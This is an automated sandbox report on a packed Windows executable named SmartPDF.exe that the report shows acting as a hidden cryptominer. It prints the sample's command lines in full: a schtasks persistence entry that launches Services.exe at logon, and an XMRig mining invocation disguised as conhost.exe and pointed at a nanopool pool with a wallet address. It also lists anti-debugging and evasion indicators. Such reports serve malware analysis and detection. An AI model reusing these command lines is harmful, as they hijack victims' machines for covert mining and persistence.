Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 13, 2021, 9:12 a.m.	Sept. 13, 2021, 9:15 a.m.

Size	21.6MB
Type	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5	`9774cdf92008b796b09b39ee32e48821`
SHA256	`0f29ab9350ea8ef259a4bade5c1f7fa4f7850ad75f123ee868c7d581817fd02e`
CRC32	`E56E3228`
ssdeep	`393216:z8Y6FB4KRu8ysEmoydsxA1YIS5nxX9OvtoaukC+dAt+MUOBwdT2lPsLUX5:aBRuFTLxAonLaoaA+dAt+Mbad6lPsI`
Yara	IsPE64 - (no description) PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware NPKI_Zero - File included NPKI

SmartPDF.exe "C:\Users\test22\AppData\Local\Temp\SmartPDF.exe"
2752
- cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
  1988
  - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'
    2320
- sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2900
- Services.exe "C:\Users\test22\AppData\Local\Temp\Services.exe"
  2136
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
    1948
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'
      1896
  - sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    2332
  - conhost.exe C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
    2392

Name	Response	Post-Analysis Lookup
raw.githubusercontent.com	A 185.199.109.133 A 185.199.111.133 A 185.199.110.133 A 185.199.108.133	185.199.110.133
pastebin.com	A 104.23.99.190 A 104.23.98.190	104.23.98.190
xmr-asia1.nanopool.org	A 139.99.102.74 A 139.99.102.73 A 139.99.102.72 A 139.99.101.232 A 139.99.102.71 A 139.99.101.197 A 103.3.62.64 A 139.99.101.198 A 139.99.102.70 A 172.104.165.191	139.99.102.73

IP Address	Status	Action
104.23.99.190	Active	Moloch
139.99.102.74	Active	Moloch
164.124.101.2	Active	Moloch
185.199.109.133	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:58838 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49175 -> 139.99.102.74:14444	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.102:49173 -> 104.23.99.190:443	906200070	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner)	undefined
TCP 192.168.56.102:49174 -> 185.199.109.133:443	906200070	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.102:49173 104.23.99.190:443	None	None	None
TLS 1.3 192.168.56.102:49174 185.199.109.133:443	None	None	None

Queries for the computername (24 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 9:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 13, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 13, 2021, 9:12 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:12 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:13 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:13 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:13 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:13 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:14 a.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 9:14 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 13, 2021, 9:13 a.m.	buffer: SUCCESS: The scheduled task "Services" has successfully been created. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW Sept. 13, 2021, 9:13 a.m.	buffer: SUCCESS: The scheduled task "Services" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 13, 2021, 9:12 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 197 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1231000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef18cb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002490000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1234000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1234000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1234000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1234000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91aaa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91aab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91afc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91acd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:12 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1231000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef18cb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 9:13 a.m.	process_identifier: 2900 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1232000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe

Creates a suspicious process (3 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 13, 2021, 9:13 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 13, 2021, 9:13 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe	1	1
ShellExecuteExW Sept. 13, 2021, 9:13 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\Services.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\Services.exe	1	1
ShellExecuteExW Sept. 13, 2021, 9:13 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 13, 2021, 9:14 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 13, 2021, 9:14 a.m.	flags: 14 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x01591e00', u'virtual_address': u'0x00002000', u'entropy': 7.999991045519299, u'name': u'.text', u'virtual_size': u'0x01591d90'}

entropy

7.99999104552

description

A section with a high entropy has been found

entropy

0.999932092897

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 13, 2021, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 13, 2021, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://xmrig.com/wizard
url	https://xmrig.com/benchmark/%s
url	https://xmrig.com/docs/algorithms

Yara rule detected in process memory (18 events)

description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Perform crypto currency mining	rule	BitCoin
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 13, 2021, 9:14 a.m.	status_code: 0xffffffff process_identifier: 2900 process_handle: 0x0000000000000244		0	0
NtTerminateProcess Sept. 13, 2021, 9:14 a.m.	status_code: 0xffffffff process_identifier: 2900 process_handle: 0x0000000000000244	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 13, 2021, 9:14 a.m.	process_identifier: 2392 region_size: 7700480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000484	1	0	0

Checks for the presence of known windows from debuggers and forensic tools (8 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowW Sept. 13, 2021, 9:14 a.m.	class_name: ProcessHacker window_name:		0	0
FindWindowW Sept. 13, 2021, 9:14 a.m.	class_name: PROCEXPL window_name:		0	0
FindWindowW Sept. 13, 2021, 9:14 a.m.	class_name: ProcessHacker window_name:		0	0
FindWindowW Sept. 13, 2021, 9:14 a.m.	class_name: PROCEXPL window_name:		0	0
FindWindowW Sept. 13, 2021, 9:15 a.m.	class_name: ProcessHacker window_name:		0	0
FindWindowW Sept. 13, 2021, 9:15 a.m.	class_name: PROCEXPL window_name:		0	0
FindWindowW Sept. 13, 2021, 9:15 a.m.	class_name: ProcessHacker window_name:		0	0
FindWindowW Sept. 13, 2021, 9:15 a.m.	class_name: PROCEXPL window_name:		0	0

Installs itself for autorun at Windows startup (3 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
